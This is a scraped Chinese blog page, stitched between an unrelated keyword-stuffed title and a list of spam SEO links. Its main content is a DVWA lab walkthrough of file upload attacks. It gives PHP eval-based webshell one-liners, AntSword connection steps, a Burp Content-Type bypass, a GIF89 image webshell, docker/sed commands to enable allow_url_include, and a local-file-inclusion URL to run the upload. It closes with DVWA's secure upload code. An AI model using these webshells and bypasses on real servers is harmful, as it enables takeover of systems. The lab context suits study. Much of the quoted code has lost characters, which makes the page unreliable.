当前位置: 首页 > news >正文

jsp python 网站开发百度搜索竞价推广

jsp python 网站开发,百度搜索竞价推广,wordpress直达按钮,网站从哪几个方面维护文件上传漏洞广泛存在于Web1.0时代#xff0c;恶意攻击者的主要攻击手法是将可执行脚本#xff08;WebShell#xff09;上传至目标服务器#xff0c;以达到控制目标服务器的目的。 此漏洞成立的前提条件至少有下面两个#xff1a; 1.可以上传对应的脚本文件#xff0c;…文件上传漏洞广泛存在于Web1.0时代恶意攻击者的主要攻击手法是将可执行脚本WebShell上传至目标服务器以达到控制目标服务器的目的。 此漏洞成立的前提条件至少有下面两个 1.可以上传对应的脚本文件并且被服务器解析比如php上传为.phpJava则上传jar包等 2.上传文件之后攻击者知道文件的地址也就是说可以从浏览器地址栏访问到文件。 我使用本地的dvwa靶场进行实战。 1. 防护级别为低low 书写脚本文件1.php ?php phpinfo(); ? 进入文件上传模块 点击上传上传成功并且可以看到上传的地址这里满足了条件1 在浏览器中拼接相关地址http://localhost:5555/vulnerabilities/upload/#/../../hackable/uploads/1.phphttp://localhost:5555/hackable/uploads/1.phphttp://localhost:5555/vulnerabilities/upload/#/../../hackable/uploads/1.php 发现成功输出了文件信息这里满足了条件2。 如果在平时的渗透测试中到这一步已经证明了漏洞存在。但是我为了增强实战能力编写了对应的可执行脚本如下这段代码很简单从post请求中获取cmd参数并且执行。这被称为一句话木马相信大家知道了通过向http://localhost:5555/hackable/uploads/1.php发出post请求即可执行任意命令也就是说等于拿到了服务器权限。 记得重新上传这个可执行脚本 ?php eval($POST[cmd]); ? 一键使用此木马的工具以前有中国菜刀现在有中国蚁剑antsword。我使用最新的antsword。 但是如下图发现返回数据为空猜测是php版本为7导致的所以我需要修改一下一句话木马。 我修改为如下的代码希望可以运行成功但是居然报了这么多的错误 ?php $pst $POST[cmd];eval(pst); ? 继续排查原因原来是第一行的分号写错了。 可执行的代码如下 ?php $pst $_POST[hacker];eval($pst); ? 右下角提示连接成功  点击添加即可使用右键可以查看支持的功能。 打开虚拟终端已经拿下了服务器权限 2.防护等级为中medium 点击查看源代码发现其通过type来判断于是可以使用burp修改发送的数据包来实现改变。 修改content type为imag/png 上传成功 3.防护等级为高High 查看源代码发现其使用后缀名判断 看到其对后缀名做了限制jpg、jpeg、png并且使用getimagesize函数确定文件头为图片。 所以我们在文件头加上图片头标识 GIF89 ?php $p $_POST[cmd];eval($p); ? 重命名为2.jpg上传成功 但是这是jpg文件无法被服务器执行所以我们使用前面的文件包含漏洞来执行 但是我的文件包含没打开即allow_url_include Off。 使用以下命令打开我的行数为824如果不知道你的就cat来确定。 docker exec -it [容器id] /bin/bash # 进入容器 cd /etc/php/7.0 sed -i 824s/.*/allow_url_include On/ php.ini docker restart [容器id] # 重启容器 然后再次尝试上传文件成功在地址栏打开注意我修改了端口号。http://127.0.0.1/vulnerabilities/fi/?pagefile:///var/www/html/hackable/uploads/2.jpg 但是使用蚁剑无法连接不知道为什么于是我又去做了一个图片马。 还是连接失败虽然文件上传成功了。 搞了很久才成功 使用记事本打开jpg在后面加上代码 到这里低中高危难度都通过了。 我们来看看不可能出现漏洞的代码可以看到其不仅判断了文件类型还将文件名使用md5的方式进行了加密就算上传可执行文件成功攻击者也无法知道具体的文件名。还对文件内容做了限制并且加上了CSRF验证。 ?phpif( isset( $_POST[ Upload ] ) ) {// Check Anti-CSRF tokencheckToken( $_REQUEST[ user_token ], $_SESSION[ session_token ], index.php );// File information$uploaded_name $_FILES[ uploaded ][ name ];$uploaded_ext substr( $uploaded_name, strrpos( $uploaded_name, . ) 1);$uploaded_size $_FILES[ uploaded ][ size ];$uploaded_type $_FILES[ uploaded ][ type ];$uploaded_tmp $_FILES[ uploaded ][ tmp_name ];// Where are we going to be writing to?$target_path DVWA_WEB_PAGE_TO_ROOT . hackable/uploads/;//$target_file basename( $uploaded_name, . . $uploaded_ext ) . -;$target_file md5( uniqid() . $uploaded_name ) . . . $uploaded_ext;$temp_file ( ( ini_get( upload_tmp_dir ) ) ? ( sys_get_temp_dir() ) : ( ini_get( upload_tmp_dir ) ) );$temp_file . DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . . . $uploaded_ext;// Is it an image?if( ( strtolower( $uploaded_ext ) jpg || strtolower( $uploaded_ext ) jpeg || strtolower( $uploaded_ext ) png ) ( $uploaded_size 100000 ) ( $uploaded_type image/jpeg || $uploaded_type image/png ) getimagesize( $uploaded_tmp ) ) {// Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)if( $uploaded_type image/jpeg ) {$img imagecreatefromjpeg( $uploaded_tmp );imagejpeg( $img, $temp_file, 100);}else {$img imagecreatefrompng( $uploaded_tmp );imagepng( $img, $temp_file, 9);}imagedestroy( $img );// Can we move the file to the web root from the temp folder?if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {// Yes!echo prea href${target_path}${target_file}${target_file}/a succesfully uploaded!/pre;}else {// Noecho preYour image was not uploaded./pre;}// Delete any temp filesif( file_exists( $temp_file ) )unlink( $temp_file );}else {// Invalid fileecho preYour image was not uploaded. We can only accept JPEG or PNG images./pre;} }// Generate Anti-CSRF token generateSessionToken();?
http://www.zqtcl.cn/news/914595/

相关文章:

  • 网站制作教程步骤软件公司怎么赚钱
  • 看世界杯网址网站更新seo
  • 深圳网站做的好的公司商洛做网站电话
  • 环保部网站官网建设项目审批做网站推广赚钱吗
  • 北仑建设局网站东莞市seo网络推广价格
  • 大专学历怎么自考优化建站
  • 网站上的图片怎么替换中国电力建设集团网站
  • 开发手机网站步骤手机网站前端开发布局技巧
  • 文山文山市网站建设网站建设管理教程视频
  • 深圳建筑业协会官网seo短视频新地址在哪里
  • 学院宣传网站制作大型网站团队人数
  • 新品发布会ppt参考友山建站优化
  • 做网站云服务器装系统厦门网站建设哪家强
  • 网站建设顶呱呱东莞建设信息网官网
  • 化妆品网站下载企业宣传片报价明细
  • php建设网站怎么用网站建设忽悠
  • 网站软件app免费注册账号qq
  • 清河网站建设公司西安开发网站的公司
  • 怎么用自己的服务器做网站软件接口设计文档
  • 昆明做网站建设找谁郑州网站制作的公司哪家好
  • 天津seo网站推广如何做医美机构网站观察分析
  • 东莞网站到首页排名网站建设与设计主要是干什么的
  • 自己做网站要花钱吗个人网站可以做资讯吗
  • 做vr效果图的网站做小程序的公司有哪些比较好
  • 物流建设网站总结制作壁纸的软件
  • 自己电脑做主机怎么做网站培训公司排名
  • 网站seo优化排名qq空间wordpress搬家
  • 做二手元器件那个网站查价格元气森林网络营销策略分析
  • 优质网站建设是哪家17网站一起做网店不发货
  • 建设企业网银如何对账seo优化推广工程师